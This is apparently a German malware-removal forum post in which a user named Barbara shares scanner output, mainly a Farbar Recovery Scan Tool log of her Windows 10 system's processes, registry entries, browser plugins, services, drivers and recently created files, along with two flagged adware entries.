          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\ads
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\ads_002
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\akademie_anleitung.png
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\anleitung-malwarebytes-anti-malware_ltr.gif
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\brand
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\connection-min.js
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\cookie.gif
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\cookieconsent.xml
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\disclaimer1.png
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\ergebnisse_zeigen.png
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\ga.js
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\google_ads.js
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\google_service.js
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\guest.css
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\icon1.gif
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\install1.png
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\logspeichernmitpfeil.png
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\log_kopieren.png
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\malwarebytes_anti_malware.jpg
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\malwarebytes_anti_malware.png
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\maware_loeschen.png
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\MBAM.png
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\mode_hybrid.gif
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\mode_linear.gif
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\mode_threaded.gif
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\navbits_start.gif
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\obenx.jpg
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\png.gif
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\post_old.gif
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\printer.gif
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\pup_settings.png
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\scanning.png
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\scan_ende.png
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\show_ads.js
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\str.gif
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\sysp-1.png
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\sysp.gif
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\threadclosed.gif
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\troja_klein_green.png
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\vbulletin_ajax_taglist.js
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\vbulletin_ajax_tagsugg.js
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\vbulletin_global.js
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\vbulletin_important.css
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\vbulletin_lightbox.js
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\vbulletin_md5.js
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\vbulletin_menu.js
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\vbulletin_post_loader.js
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\yahoo-dom-event.js
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\11x11progress.gif
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\ads
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\ads_002
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\av-175240.jpg
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\biggrin.gif
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\brand
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\connection-min.js
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\cookie.gif
          1.1s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\cookieconsent.xml
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\donatepaypal.gif
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\FRST%20Console%20with%2090days.jpg
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\FRST%20icon%20May%202016.jpg
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\frst-anleitung_ltr.gif
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\frst.png
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\ga.js
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\google_ads.js
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\google_service.js
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\guest.css
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\icon1.gif
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\kompetenzteam.gif
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\mode_hybrid.gif
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\mode_linear.gif
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\mode_threaded.gif
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\navbits_start.gif
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\obenx.jpg
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\post_old.gif
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\printer.gif
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\reply.gif
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\show_ads.js
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\stg.gif
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\str.gif
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\troja_klein_green.png
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\vbulletin_ajax_taglist.js
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\vbulletin_ajax_tagsugg.js
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\vbulletin_global.js
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\vbulletin_important.css
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\vbulletin_lightbox.js
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\vbulletin_md5.js
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\vbulletin_menu.js
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\vbulletin_post_loader.js
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\windows.jpg
          1.2s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung-Dateien\yahoo-dom-event.js


Potential Unwanted Programs _________________________________________________

   C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk (Tuvaro)
   HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\IM\ (Sweetpacks)

ich hoffe, das war nicht allzu unübersichtlich mit den vielen Teilen...

frst

Code:

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 12-02-2017
durchgeführt von Barbara (Administrator) auf BARBARA-PC (13-02-2017 22:39:35)
Gestartet von C:\Users\Barbara\Desktop\Virenscanner etc
Geladene Profile: Barbara (Verfügbare Profile: Barbara)
Platform: Windows 10 Pro Version 1607 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Edge)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
(Apple Computer, Inc.) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Spotify Ltd) C:\Users\Barbara\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7903.40527.0_x64__8wekyb3d8bbwe\HxMail.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7903.40527.0_x64__8wekyb3d8bbwe\HxTsr.exe
() C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1701.10102.0_x64__8wekyb3d8bbwe\Calculator.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.105.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-23] (Microsoft Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [598552 2016-06-22] (Oracle Corporation)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [Spotify Web Helper] => C:\Users\Barbara\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1444976 2016-12-31] (Spotify Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [Spotify] => C:\Users\Barbara\AppData\Roaming\Spotify\Spotify.exe [7153264 2016-12-31] (Spotify Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [Steam] => c:\Program Files (x86)\Steam\steam.exe [2851408 2016-07-09] (Valve Corporation)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8912088 2016-08-26] (Piriform Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\Bubbles.scr [806400 2016-07-16] (Microsoft Corporation)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{92a07177-073c-4d90-93ea-d374613fc39e}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\ssv.dll [2016-07-30] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-07-30] (Oracle Corporation)

FireFox:
========
FF DefaultProfile: 8rnx3iua.default
FF ProfilePath: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default [2017-02-13]
FF Extension: (2020 3D Viewer for IKEA) - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\Extensions\2020Player_IKEA@2020Technologies.com [2016-12-16]
FF Extension: (Firefox Hotfix) - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-09-01]
FF Extension: (Ghostery) - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\Extensions\firefox@ghostery.com.xpi [2017-02-12]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_186.dll [2016-12-16] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_186.dll [2016-12-16] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-07-30] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-07-30] (Oracle Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)

Chrome: 
=======
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 Bonjour Service; C:\Program Files (x86)\Bonjour\mDNSResponder.exe [229376 2006-02-28] (Apple Computer, Inc.) [Datei ist nicht signiert]
S3 FLEXnet Licensing Service; C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [654848 2016-09-03] (Macrovision Europe Ltd.) [Datei ist nicht signiert]
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-01-20] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-01-20] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-12-29] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [425408 2017-01-20] (NVIDIA Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2142728 2016-10-22] (Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [2209296 2016-10-22] (Electronic Arts)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2889896 2016-09-15] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77416 2017-01-20] ()
R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [176584 2017-02-13] (Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [110536 2017-02-13] (Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-02-13] (Malwarebytes)
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [251848 2017-02-13] (Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [91584 2017-02-13] (Malwarebytes)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispiwu.inf_amd64_b67dc924fff8de6d\nvlddmkm.sys [14199224 2017-01-04] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [27584 2017-01-20] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [46016 2017-01-20] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-01-20] (NVIDIA Corporation)
R2 Sentinel64; C:\WINDOWS\System32\Drivers\Sentinel64.sys [145448 2009-09-17] (SafeNet, Inc.)
S3 SNTUSB64; C:\WINDOWS\System32\drivers\SNTUSB64.SYS [63528 2011-05-27] (SafeNet, Inc.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
U3 idsvc; kein ImagePath

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-02-13 22:30 - 2017-02-13 22:35 - 00000000 ____D C:\ProgramData\HitmanPro
2017-02-13 22:27 - 2017-02-13 22:27 - 00008446 _____ C:\Users\Barbara\Desktop\eset.txt
2017-02-13 21:25 - 2017-02-13 21:25 - 00000000 ____D C:\Users\Barbara\AppData\Local\Chromium
2017-02-13 20:47 - 2017-02-13 20:47 - 00018791 _____ C:\Users\Barbara\Desktop\mbam.txt
2017-02-13 20:42 - 2017-02-13 21:34 - 00091584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-02-13 20:42 - 2017-02-13 21:24 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-02-13 20:42 - 2017-02-13 21:24 - 00110536 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-02-13 20:42 - 2017-02-13 21:24 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-02-13 20:42 - 2017-02-13 20:42 - 00176584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-02-13 20:42 - 2017-02-13 20:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-02-13 20:42 - 2017-02-13 20:42 - 00000000 ____D C:\Program Files\Malwarebytes
2017-02-13 20:42 - 2017-01-20 07:47 - 00077416 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-02-13 20:41 - 2017-02-13 22:39 - 00000000 ____D C:\Users\Barbara\Desktop\alt
2017-02-13 20:41 - 2017-02-13 20:41 - 00019083 _____ C:\Users\Barbara\Desktop\AdwCleaner[C0].txt
2017-02-13 20:14 - 2017-02-13 20:38 - 00000000 ____D C:\AdwCleaner
2017-02-13 19:59 - 2017-02-13 19:59 - 07097928 _____ (VS Revo Group ) C:\Users\Barbara\Desktop\revo202setup.exe
2017-02-13 19:59 - 2017-02-13 19:59 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-02-13 19:59 - 2017-02-13 19:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-02-13 19:59 - 2017-02-13 19:59 - 00000000 ____D C:\Program Files\VS Revo Group
2017-02-13 19:08 - 2017-02-13 20:42 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-02-13 19:07 - 2017-02-13 22:39 - 00000000 ____D C:\FRST
2017-02-13 19:06 - 2017-02-13 22:39 - 00000000 ____D C:\Users\Barbara\Desktop\Virenscanner etc
2017-02-11 17:30 - 2017-02-11 17:30 - 11617413 _____ C:\Users\Barbara\Downloads\ColorSplash (1).themepack
2017-02-11 17:29 - 2017-02-11 17:29 - 11617413 _____ C:\Users\Barbara\Downloads\ColorSplash.themepack
2017-02-11 17:29 - 2017-02-11 17:29 - 08635521 _____ C:\Users\Barbara\Downloads\DreamgardenChristinaManchenko.themepack
2017-02-09 13:38 - 2017-02-12 20:33 - 00000000 ____D C:\WINDOWS\LastGood
2017-02-09 13:38 - 2017-02-09 13:38 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-02-09 13:38 - 2017-01-04 15:24 - 00222648 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-02-09 13:38 - 2016-12-29 13:43 - 00133056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-02-09 13:38 - 2016-09-09 19:25 - 00269600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-02-09 13:38 - 2016-09-09 19:25 - 00261920 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-02-09 13:38 - 2016-09-09 19:25 - 00110880 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-02-09 13:38 - 2016-09-09 19:24 - 00125216 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-02-03 17:19 - 2017-02-03 17:19 - 00515204 _____ C:\WINDOWS\Minidump\020317-6328-01.dmp
2017-02-03 17:12 - 2017-02-03 17:12 - 00004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2017-02-03 17:12 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2017-02-03 17:12 - 2017-01-20 19:39 - 00156608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2017-02-03 17:12 - 2017-01-20 19:39 - 00124352 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2017-02-03 17:12 - 2017-01-20 19:39 - 00057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2017-02-03 17:12 - 2017-01-20 14:36 - 00001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
2017-01-26 18:15 - 2017-02-13 19:12 - 00001308 _____ C:\Users\Public\Desktop\ElsterFormular.lnk
2017-01-26 18:15 - 2017-01-26 18:17 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\elsterformular
2017-01-26 18:15 - 2017-01-26 18:17 - 00000000 ____D C:\ProgramData\elsterformular
2017-01-26 18:15 - 2017-01-26 18:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular
